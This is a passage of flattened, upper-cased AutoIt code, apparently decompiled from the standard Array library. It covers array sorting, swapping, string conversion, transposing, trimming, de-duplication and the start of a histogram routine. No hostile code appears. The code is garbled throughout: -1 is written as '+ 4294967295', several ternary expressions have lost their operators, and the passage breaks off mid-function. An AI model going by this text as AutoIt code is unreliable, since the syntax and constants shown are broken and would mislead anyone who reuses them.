ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = + 4294967295 THEN RETURN SETERROR (5 , 0 , 0 ) IF $IEND = DEFAULT THEN $IEND = 0 IF $IEND < 1 OR $IEND > $IUBOUND OR $IEND = DEFAULT THEN $IEND = $IUBOUND IF $ISTART < 0 OR $ISTART = DEFAULT THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (2 , 0 , 0 ) IF $IDESCENDING = DEFAULT THEN $IDESCENDING = 0 IF $IPIVOT = DEFAULT THEN $IPIVOT = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IPIVOT THEN __ARRAYDUALPIVOTSORT ($AARRAY , $ISTART , $IEND ) ELSE __ARRAYQUICKSORT1D ($AARRAY , $ISTART , $IEND ) ENDIF IF $IDESCENDING THEN _ARRAYREVERSE ($AARRAY , $ISTART , $IEND ) CASE 2 IF $IPIVOT THEN RETURN SETERROR (6 , 0 , 0 ) LOCAL $ISUBMAX = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISUBITEM > $ISUBMAX THEN RETURN SETERROR (3 , 0 , 0 ) IF $IDESCENDING THEN $IDESCENDING = + 4294967295 ELSE $IDESCENDING = 1 ENDIF __ARRAYQUICKSORT2D ($AARRAY , $IDESCENDING , $ISTART , $IEND , $ISUBITEM , $ISUBMAX ) CASE ELSE RETURN SETERROR (4 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC __ARRAYQUICKSORT1D (BYREF $AARRAY , CONST BYREF $ISTART , CONST BYREF $IEND ) IF $IEND <= $ISTART THEN RETURN LOCAL $VTMP IF ($IEND - $ISTART ) < 15 THEN LOCAL $VCUR FOR $I = $ISTART + 1 TO $IEND $VTMP = $AARRAY [$I ] IF ISNUMBER ($VTMP ) THEN FOR $J = $I + 4294967295 TO $ISTART STEP + 4294967295 $VCUR = $AARRAY [$J ] IF ($VTMP >= $VCUR AND ISNUMBER ($VCUR ) ) OR (NOT ISNUMBER ($VCUR ) AND STRINGCOMPARE ($VTMP , $VCUR ) >= 0 ) THEN EXITLOOP $AARRAY [$J + 1 ] = $VCUR NEXT ELSE FOR $J = $I + 4294967295 TO $ISTART STEP + 4294967295 IF (STRINGCOMPARE ($VTMP , $AARRAY [$J ] ) >= 0 ) THEN EXITLOOP $AARRAY [$J + 1 ] = $AARRAY [$J ] NEXT ENDIF $AARRAY [$J + 1 ] = $VTMP NEXT RETURN ENDIF LOCAL $L = $ISTART , $R = $IEND , $VPIVOT = $AARRAY [INT (($ISTART + $IEND ) / 2 ) ] , $BNUM = ISNUMBER ($VPIVOT ) DO IF $BNUM THEN WHILE ($AARRAY [$L ] < $VPIVOT AND ISNUMBER ($AARRAY [$L ] ) ) OR (NOT ISNUMBER ($AARRAY [$L ] ) AND STRINGCOMPARE ($AARRAY [$L ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE ($AARRAY [$R ] > $VPIVOT AND ISNUMBER ($AARRAY [$R ] ) ) OR (NOT ISNUMBER ($AARRAY [$R ] ) AND STRINGCOMPARE ($AARRAY [$R ] , $VPIVOT ) > 0 ) $R -= 1 WEND ELSE WHILE (STRINGCOMPARE ($AARRAY [$L ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE (STRINGCOMPARE ($AARRAY [$R ] , $VPIVOT ) > 0 ) $R -= 1 WEND ENDIF IF $L <= $R THEN $VTMP = $AARRAY [$L ] $AARRAY [$L ] = $AARRAY [$R ] $AARRAY [$R ] = $VTMP $L += 1 $R -= 1 ENDIF UNTIL $L > $R __ARRAYQUICKSORT1D ($AARRAY , $ISTART , $R ) __ARRAYQUICKSORT1D ($AARRAY , $L , $IEND ) ENDFUNC FUNC __ARRAYQUICKSORT2D (BYREF $AARRAY , CONST BYREF $ISTEP , CONST BYREF $ISTART , CONST BYREF $IEND , CONST BYREF $ISUBITEM , CONST BYREF $ISUBMAX ) IF $IEND <= $ISTART THEN RETURN LOCAL $VTMP , $L = $ISTART , $R = $IEND , $VPIVOT = $AARRAY [INT (($ISTART + $IEND ) / 2 ) ] [$ISUBITEM ] , $BNUM = ISNUMBER ($VPIVOT ) DO IF $BNUM THEN WHILE ($ISTEP * ($AARRAY [$L ] [$ISUBITEM ] - $VPIVOT ) < 0 AND ISNUMBER ($AARRAY [$L ] [$ISUBITEM ] ) ) OR (NOT ISNUMBER ($AARRAY [$L ] [$ISUBITEM ] ) AND $ISTEP * STRINGCOMPARE ($AARRAY [$L ] [$ISUBITEM ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE ($ISTEP * ($AARRAY [$R ] [$ISUBITEM ] - $VPIVOT ) > 0 AND ISNUMBER ($AARRAY [$R ] [$ISUBITEM ] ) ) OR (NOT ISNUMBER ($AARRAY [$R ] [$ISUBITEM ] ) AND $ISTEP * STRINGCOMPARE ($AARRAY [$R ] [$ISUBITEM ] , $VPIVOT ) > 0 ) $R -= 1 WEND ELSE WHILE ($ISTEP * STRINGCOMPARE ($AARRAY [$L ] [$ISUBITEM ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE ($ISTEP * STRINGCOMPARE ($AARRAY [$R ] [$ISUBITEM ] , $VPIVOT ) > 0 ) $R -= 1 WEND ENDIF IF $L <= $R THEN FOR $I = 0 TO $ISUBMAX $VTMP = $AARRAY [$L ] [$I ] $AARRAY [$L ] [$I ] = $AARRAY [$R ] [$I ] $AARRAY [$R ] [$I ] = $VTMP NEXT $L += 1 $R -= 1 ENDIF UNTIL $L > $R __ARRAYQUICKSORT2D ($AARRAY , $ISTEP , $ISTART , $R , $ISUBITEM , $ISUBMAX ) __ARRAYQUICKSORT2D ($AARRAY , $ISTEP , $L , $IEND , $ISUBITEM , $ISUBMAX ) ENDFUNC FUNC __ARRAYDUALPIVOTSORT (BYREF $AARRAY , $IPIVOT_LEFT , $IPIVOT_RIGHT , $BLEFTMOST = TRUE ) IF $IPIVOT_LEFT > $IPIVOT_RIGHT THEN RETURN LOCAL $ILENGTH = $IPIVOT_RIGHT - $IPIVOT_LEFT + 1 LOCAL $I , $J , $K , $IAI , $IAK , $IA1 , $IA2 , $ILAST IF $ILENGTH < 45 THEN IF $BLEFTMOST THEN $I = $IPIVOT_LEFT WHILE $I < $IPIVOT_RIGHT $J = $I $IAI = $AARRAY [$I + 1 ] WHILE $IAI < $AARRAY [$J ] $AARRAY [$J + 1 ] = $AARRAY [$J ] $J -= 1 IF $J + 1 = $IPIVOT_LEFT THEN EXITLOOP WEND $AARRAY [$J + 1 ] = $IAI $I += 1 WEND ELSE WHILE 1 IF $IPIVOT_LEFT >= $IPIVOT_RIGHT THEN RETURN 1 $IPIVOT_LEFT += 1 IF $AARRAY [$IPIVOT_LEFT ] < $AARRAY [$IPIVOT_LEFT + 4294967295 ] THEN EXITLOOP WEND WHILE 1 $K = $IPIVOT_LEFT $IPIVOT_LEFT += 1 IF $IPIVOT_LEFT > $IPIVOT_RIGHT THEN EXITLOOP $IA1 = $AARRAY [$K ] $IA2 = $AARRAY [$IPIVOT_LEFT ] IF $IA1 < $IA2 THEN $IA2 = $IA1 $IA1 = $AARRAY [$IPIVOT_LEFT ] ENDIF $K -= 1 WHILE $IA1 < $AARRAY [$K ] $AARRAY [$K + 2 ] = $AARRAY [$K ] $K -= 1 WEND $AARRAY [$K + 2 ] = $IA1 WHILE $IA2 < $AARRAY [$K ] $AARRAY [$K + 1 ] = $AARRAY [$K ] $K -= 1 WEND $AARRAY [$K + 1 ] = $IA2 $IPIVOT_LEFT += 1 WEND $ILAST = $AARRAY [$IPIVOT_RIGHT ] $IPIVOT_RIGHT -= 1 WHILE $ILAST < $AARRAY [$IPIVOT_RIGHT ] $AARRAY [$IPIVOT_RIGHT + 1 ] = $AARRAY [$IPIVOT_RIGHT ] $IPIVOT_RIGHT -= 1 WEND $AARRAY [$IPIVOT_RIGHT + 1 ] = $ILAST ENDIF RETURN 1 ENDIF LOCAL $ISEVENTH = BITSHIFT ($ILENGTH , 3 ) + BITSHIFT ($ILENGTH , 6 ) + 1 LOCAL $IE1 , $IE2 , $IE3 , $IE4 , $IE5 , $T $IE3 = CEILING (($IPIVOT_LEFT + $IPIVOT_RIGHT ) / 2 ) $IE2 = $IE3 - $ISEVENTH $IE1 = $IE2 - $ISEVENTH $IE4 = $IE3 + $ISEVENTH $IE5 = $IE4 + $ISEVENTH IF $AARRAY [$IE2 ] < $AARRAY [$IE1 ] THEN $T = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF IF $AARRAY [$IE3 ] < $AARRAY [$IE2 ] THEN $T = $AARRAY [$IE3 ] $AARRAY [$IE3 ] = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $T IF $T < $AARRAY [$IE1 ] THEN $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF ENDIF IF $AARRAY [$IE4 ] < $AARRAY [$IE3 ] THEN $T = $AARRAY [$IE4 ] $AARRAY [$IE4 ] = $AARRAY [$IE3 ] $AARRAY [$IE3 ] = $T IF $T < $AARRAY [$IE2 ] THEN $AARRAY [$IE3 ] = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $T IF $T < $AARRAY [$IE1 ] THEN $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF ENDIF ENDIF IF $AARRAY [$IE5 ] < $AARRAY [$IE4 ] THEN $T = $AARRAY [$IE5 ] $AARRAY [$IE5 ] = $AARRAY [$IE4 ] $AARRAY [$IE4 ] = $T IF $T < $AARRAY [$IE3 ] THEN $AARRAY [$IE4 ] = $AARRAY [$IE3 ] $AARRAY [$IE3 ] = $T IF $T < $AARRAY [$IE2 ] THEN $AARRAY [$IE3 ] = $AARRAY [$IE2 ] $AARRAY [$IE2 ] = $T IF $T < $AARRAY [$IE1 ] THEN $AARRAY [$IE2 ] = $AARRAY [$IE1 ] $AARRAY [$IE1 ] = $T ENDIF ENDIF ENDIF ENDIF LOCAL $ILESS = $IPIVOT_LEFT LOCAL $IGREATER = $IPIVOT_RIGHT IF (($AARRAY [$IE1 ] <> $AARRAY [$IE2 ] ) AND ($AARRAY [$IE2 ] <> $AARRAY [$IE3 ] ) AND ($AARRAY [$IE3 ] <> $AARRAY [$IE4 ] ) AND ($AARRAY [$IE4 ] <> $AARRAY [$IE5 ] ) ) THEN LOCAL $IPIVOT_1 = $AARRAY [$IE2 ] LOCAL $IPIVOT_2 = $AARRAY [$IE4 ] $AARRAY [$IE2 ] = $AARRAY [$IPIVOT_LEFT ] $AARRAY [$IE4 ] = $AARRAY [$IPIVOT_RIGHT ] DO $ILESS += 1 UNTIL $AARRAY [$ILESS ] >= $IPIVOT_1 DO $IGREATER -= 1 UNTIL $AARRAY [$IGREATER ] <= $IPIVOT_2 $K = $ILESS WHILE $K <= $IGREATER $IAK = $AARRAY [$K ] IF $IAK < $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IAK $ILESS += 1 ELSEIF $IAK > $IPIVOT_2 THEN WHILE $AARRAY [$IGREATER ] > $IPIVOT_2 $IGREATER -= 1 IF $IGREATER + 1 = $K THEN EXITLOOP 2 WEND IF $AARRAY [$IGREATER ] < $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $AARRAY [$IGREATER ] $ILESS += 1 ELSE $AARRAY [$K ] = $AARRAY [$IGREATER ] ENDIF $AARRAY [$IGREATER ] = $IAK $IGREATER -= 1 ENDIF $K += 1 WEND $AARRAY [$IPIVOT_LEFT ] = $AARRAY [$ILESS + 4294967295 ] $AARRAY [$ILESS + 4294967295 ] = $IPIVOT_1 $AARRAY [$IPIVOT_RIGHT ] = $AARRAY [$IGREATER + 1 ] $AARRAY [$IGREATER + 1 ] = $IPIVOT_2 __ARRAYDUALPIVOTSORT ($AARRAY , $IPIVOT_LEFT , $ILESS + 4294967294 , TRUE ) __ARRAYDUALPIVOTSORT ($AARRAY , $IGREATER + 2 , $IPIVOT_RIGHT , FALSE ) IF ($ILESS < $IE1 ) AND ($IE5 < $IGREATER ) THEN WHILE $AARRAY [$ILESS ] = $IPIVOT_1 $ILESS += 1 WEND WHILE $AARRAY [$IGREATER ] = $IPIVOT_2 $IGREATER -= 1 WEND $K = $ILESS WHILE $K <= $IGREATER $IAK = $AARRAY [$K ] IF $IAK = $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IAK $ILESS += 1 ELSEIF $IAK = $IPIVOT_2 THEN WHILE $AARRAY [$IGREATER ] = $IPIVOT_2 $IGREATER -= 1 IF $IGREATER + 1 = $K THEN EXITLOOP 2 WEND IF $AARRAY [$IGREATER ] = $IPIVOT_1 THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IPIVOT_1 $ILESS += 1 ELSE $AARRAY [$K ] = $AARRAY [$IGREATER ] ENDIF $AARRAY [$IGREATER ] = $IAK $IGREATER -= 1 ENDIF $K += 1 WEND ENDIF __ARRAYDUALPIVOTSORT ($AARRAY , $ILESS , $IGREATER , FALSE ) ELSE LOCAL $IPIVOT = $AARRAY [$IE3 ] $K = $ILESS WHILE $K <= $IGREATER IF $AARRAY [$K ] = $IPIVOT THEN $K += 1 CONTINUELOOP ENDIF $IAK = $AARRAY [$K ] IF $IAK < $IPIVOT THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $IAK $ILESS += 1 ELSE WHILE $AARRAY [$IGREATER ] > $IPIVOT $IGREATER -= 1 WEND IF $AARRAY [$IGREATER ] < $IPIVOT THEN $AARRAY [$K ] = $AARRAY [$ILESS ] $AARRAY [$ILESS ] = $AARRAY [$IGREATER ] $ILESS += 1 ELSE $AARRAY [$K ] = $IPIVOT ENDIF $AARRAY [$IGREATER ] = $IAK $IGREATER -= 1 ENDIF $K += 1 WEND __ARRAYDUALPIVOTSORT ($AARRAY , $IPIVOT_LEFT , $ILESS + 4294967295 , TRUE ) __ARRAYDUALPIVOTSORT ($AARRAY , $IGREATER + 1 , $IPIVOT_RIGHT , FALSE ) ENDIF ENDFUNC FUNC _ARRAYSWAP (BYREF $AARRAY , $IINDEX_1 , $IINDEX_2 , $BCOL = FALSE , $ISTART = + 4294967295 , $IEND = + 4294967295 ) IF $BCOL = DEFAULT THEN $BCOL = FALSE IF $ISTART = DEFAULT THEN $ISTART = + 4294967295 IF $IEND = DEFAULT THEN $IEND = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $IDIM_2 = + 4294967295 THEN $BCOL = FALSE $ISTART = + 4294967295 $IEND = + 4294967295 ENDIF IF $ISTART > $IEND THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $BCOL THEN IF $IINDEX_1 < 0 OR $IINDEX_2 > $IDIM_2 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $IEND = + 4294967295 THEN $IEND = $IDIM_1 ELSE IF $IINDEX_1 < 0 OR $IINDEX_2 > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $IEND = + 4294967295 THEN $IEND = $IDIM_2 ENDIF LOCAL $VTMP SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 $VTMP = $AARRAY [$IINDEX_1 ] $AARRAY [$IINDEX_1 ] = $AARRAY [$IINDEX_2 ] $AARRAY [$IINDEX_2 ] = $VTMP CASE 2 IF $ISTART < + 4294967295 OR $IEND < + 4294967295 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) IF $BCOL THEN IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) FOR $J = $ISTART TO $IEND $VTMP = $AARRAY [$J ] [$IINDEX_1 ] $AARRAY [$J ] [$IINDEX_1 ] = $AARRAY [$J ] [$IINDEX_2 ] $AARRAY [$J ] [$IINDEX_2 ] = $VTMP NEXT ELSE IF $ISTART > $IDIM_2 OR $IEND > $IDIM_2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) FOR $J = $ISTART TO $IEND $VTMP = $AARRAY [$IINDEX_1 ] [$J ] $AARRAY [$IINDEX_1 ] [$J ] = $AARRAY [$IINDEX_2 ] [$J ] $AARRAY [$IINDEX_2 ] [$J ] = $VTMP NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTOCLIP (CONST BYREF $AARRAY , $SDELIM_COL = "|" , $ISTART_ROW = + 4294967295 , $IEND_ROW = + 4294967295 , $SDELIM_ROW = @CRLF , $ISTART_COL = + 4294967295 , $IEND_COL = + 4294967295 ) LOCAL $SRESULT = _ARRAYTOSTRING ($AARRAY , $SDELIM_COL , $ISTART_ROW , $IEND_ROW , $SDELIM_ROW , $ISTART_COL , $IEND_COL ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , 0 ) IF CLIPPUT ($SRESULT ) THEN RETURN 1 RETURN SETERROR (+ 4294967295 , 0 , 0 ) ENDFUNC FUNC _ARRAYTOSTRING (CONST BYREF $AARRAY , $SDELIM_COL = "|" , $ISTART_ROW = + 4294967295 , $IEND_ROW = + 4294967295 , $SDELIM_ROW = @CRLF , $ISTART_COL = + 4294967295 , $IEND_COL = + 4294967295 ) IF $SDELIM_COL = DEFAULT THEN $SDELIM_COL = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $ISTART_ROW = DEFAULT THEN $ISTART_ROW = + 4294967295 IF $IEND_ROW = DEFAULT THEN $IEND_ROW = + 4294967295 IF $ISTART_COL = DEFAULT THEN $ISTART_COL = + 4294967295 IF $IEND_COL = DEFAULT THEN $IEND_COL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $ISTART_ROW = + 4294967295 THEN $ISTART_ROW = 0 IF $IEND_ROW = + 4294967295 THEN $IEND_ROW = $IDIM_1 IF $ISTART_ROW < + 4294967295 OR $IEND_ROW < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IDIM_1 OR $IEND_ROW > $IDIM_1 THEN RETURN SETERROR (3 , 0 , "" ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $SRET = "" SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = $ISTART_ROW TO $IEND_ROW $SRET &= $AARRAY [$I ] & $SDELIM_COL NEXT RETURN STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_COL ) ) CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISTART_COL = + 4294967295 THEN $ISTART_COL = 0 IF $IEND_COL = + 4294967295 THEN $IEND_COL = $IDIM_2 IF $ISTART_COL < + 4294967295 OR $IEND_COL < + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IDIM_2 OR $IEND_COL > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IEND_COL THEN RETURN SETERROR (6 , 0 , + 4294967295 ) FOR $I = $ISTART_ROW TO $IEND_ROW FOR $J = $ISTART_COL TO $IEND_COL $SRET &= $AARRAY [$I ] [$J ] & $SDELIM_COL NEXT $SRET = STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_COL ) ) & $SDELIM_ROW NEXT RETURN STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_ROW ) ) CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTRANSPOSE (BYREF $AARRAY ) SWITCH UBOUND ($AARRAY , 0 ) CASE 0 RETURN SETERROR (2 , 0 , 0 ) CASE 1 LOCAL $ATEMP [1 ] [UBOUND ($AARRAY ) ] FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $ATEMP [0 ] [$I ] = $AARRAY [$I ] NEXT $AARRAY = $ATEMP CASE 2 LOCAL $IDIM_1 = UBOUND ($AARRAY , 1 ) , $IDIM_2 = UBOUND ($AARRAY , 2 ) IF $IDIM_1 <> $IDIM_2 THEN LOCAL $ATEMP [$IDIM_2 ] [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 $ATEMP [$J ] [$I ] = $AARRAY [$I ] [$J ] NEXT NEXT $AARRAY = $ATEMP ELSE LOCAL $VELEMENT FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $I + 1 TO $IDIM_2 + 4294967295 $VELEMENT = $AARRAY [$I ] [$J ] $AARRAY [$I ] [$J ] = $AARRAY [$J ] [$I ] $AARRAY [$J ] [$I ] = $VELEMENT NEXT NEXT ENDIF CASE ELSE RETURN SETERROR (1 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTRIM (BYREF $AARRAY , $ITRIMNUM , $IDIRECTION = 0 , $ISTART = 0 , $IEND = 0 , $ISUBITEM = 0 ) IF $IDIRECTION = DEFAULT THEN $IDIRECTION = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IEND = 0 THEN $IEND = $IDIM_1 IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART < 0 OR $IEND < 0 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IDIRECTION THEN FOR $I = $ISTART TO $IEND $AARRAY [$I ] = STRINGTRIMRIGHT ($AARRAY [$I ] , $ITRIMNUM ) NEXT ELSE FOR $I = $ISTART TO $IEND $AARRAY [$I ] = STRINGTRIMLEFT ($AARRAY [$I ] , $ITRIMNUM ) NEXT ENDIF CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISUBITEM < 0 OR $ISUBITEM > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $IDIRECTION THEN FOR $I = $ISTART TO $IEND $AARRAY [$I ] [$ISUBITEM ] = STRINGTRIMRIGHT ($AARRAY [$I ] [$ISUBITEM ] , $ITRIMNUM ) NEXT ELSE FOR $I = $ISTART TO $IEND $AARRAY [$I ] [$ISUBITEM ] = STRINGTRIMLEFT ($AARRAY [$I ] [$ISUBITEM ] , $ITRIMNUM ) NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYUNIQUE (CONST BYREF $AARRAY , $ICOLUMN = 0 , $IBASE = 0 , $ICASE = 0 , $ICOUNT = $ARRAYUNIQUE_COUNT , $IINTTYPE = $ARRAYUNIQUE_AUTO ) IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 IF $IBASE = DEFAULT THEN $IBASE = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOUNT = DEFAULT THEN $ICOUNT = $ARRAYUNIQUE_COUNT IF UBOUND ($AARRAY , $UBOUND_ROWS ) = 0 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $INUMCOLUMNS = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMS > 2 THEN RETURN SETERROR (2 , 0 , 0 ) IF $IBASE < 0 OR $IBASE > 1 OR (NOT ISINT ($IBASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICASE < 0 OR $ICASE > 1 OR (NOT ISINT ($ICASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICOUNT < 0 OR $ICOUNT > 1 OR (NOT ISINT ($ICOUNT ) ) THEN RETURN SETERROR (4 , 0 , 0 ) IF $IINTTYPE < 0 OR $IINTTYPE > 4 OR (NOT ISINT ($IINTTYPE ) ) THEN RETURN SETERROR (5 , 0 , 0 ) IF $ICOLUMN < 0 OR ($INUMCOLUMNS = 0 AND $ICOLUMN > 0 ) OR ($INUMCOLUMNS > 0 AND $ICOLUMN >= $INUMCOLUMNS ) THEN RETURN SETERROR (6 , 0 , 0 ) IF $IINTTYPE = $ARRAYUNIQUE_AUTO THEN LOCAL $VFIRSTELEM = (($IDIMS = 1 ) ($AARRAY [$IBASE ] ) ($AARRAY [$ICOLUMN ] [$IBASE ] ) ) IF ISINT ($VFIRSTELEM ) THEN SWITCH VARGETTYPE ($VFIRSTELEM ) CASE "Int32" $IINTTYPE = $ARRAYUNIQUE_FORCE32 CASE "Int64" $IINTTYPE = $ARRAYUNIQUE_FORCE64 ENDSWITCH ELSE $IINTTYPE = $ARRAYUNIQUE_FORCE32 ENDIF ENDIF OBJEVENT ("AutoIt.Error" , "__ArrayUnique_AutoErrFunc" ) LOCAL $ODICTIONARY = OBJCREATE ("Scripting.Dictionary" ) $ODICTIONARY.CompareMode = NUMBER (NOT $ICASE ) LOCAL $VELEM , $STYPE , $VKEY , $BCOMERROR = FALSE FOR $I = $IBASE TO UBOUND ($AARRAY ) + 4294967295 IF $IDIMS = 1 THEN $VELEM = $AARRAY [$I ] ELSE $VELEM = $AARRAY [$I ] [$ICOLUMN ] ENDIF SWITCH $IINTTYPE CASE $ARRAYUNIQUE_FORCE32 $ODICTIONARY.Item ($VELEM ) IF @ERROR THEN $BCOMERROR = TRUE EXITLOOP ENDIF CASE $ARRAYUNIQUE_FORCE64 $STYPE = VARGETTYPE ($VELEM ) IF $STYPE = "Int32" THEN $BCOMERROR = TRUE EXITLOOP ENDIF $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_MATCH $STYPE = VARGETTYPE ($VELEM ) IF STRINGLEFT ($STYPE , 3 ) = "Int" THEN $VKEY = "#Int#" & STRING ($VELEM ) ELSE $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) ENDIF IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_DISTINCT $VKEY = "#" & VARGETTYPE ($VELEM ) & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF ENDSWITCH NEXT LOCAL $AVALUES , $J = 0 IF $BCOMERROR THEN RETURN SETERROR (7 , 0 , 0 ) ELSEIF $IINTTYPE <> $ARRAYUNIQUE_FORCE32 THEN LOCAL $AVALUES [$ODICTIONARY.Count ] FOR $VKEY IN $ODICTIONARY.Keys () $AVALUES [$J ] = $ODICTIONARY ($VKEY ) IF STRINGLEFT ($VKEY , 5 ) = "#Ptr#" THEN $AVALUES [$J ] = PTR ($AVALUES [$J ] ) ENDIF $J += 1 NEXT ELSE $AVALUES = $ODICTIONARY.Keys () ENDIF IF $ICOUNT THEN _ARRAYINSERT ($AVALUES , 0 , $ODICTIONARY.Count ) ENDIF RETURN $AVALUES ENDFUNC FUNC _ARRAY1DTOHISTOGRAM ($AARRAY , $ISIZING = 100 ) IF UBOUND ($AARRAY , 0 ) > 1 THEN RETURN SETERROR (1 , 0 , "" ) $ISIZING = $ISIZING * 8 LOCAL $T , $N , $IMIN = 0 , $IMAX = 0 , $IOFFSET = 0 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] $T = ISNUMBER ($T ) ROUND ($T ) 0 IF $T < $IMIN THEN $IMIN = $T IF $T > $IMAX THEN $IMAX = $T NEXT LOCAL $IRANGE = INT (ROUND (($IMAX - $IMIN ) / 8 ) ) * 8 LOCAL $ISPACERATIO = 4 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] IF $T THEN $N = ABS (ROUND (($ISIZING * $T ) / $IRANGE ) / 8 ) $AARRAY [$I ] = "" IF $T > 0 THEN IF $IMIN THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * $IMIN ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ELSE IF $IMIN <> $T THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * ($T - $IMIN ) ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I 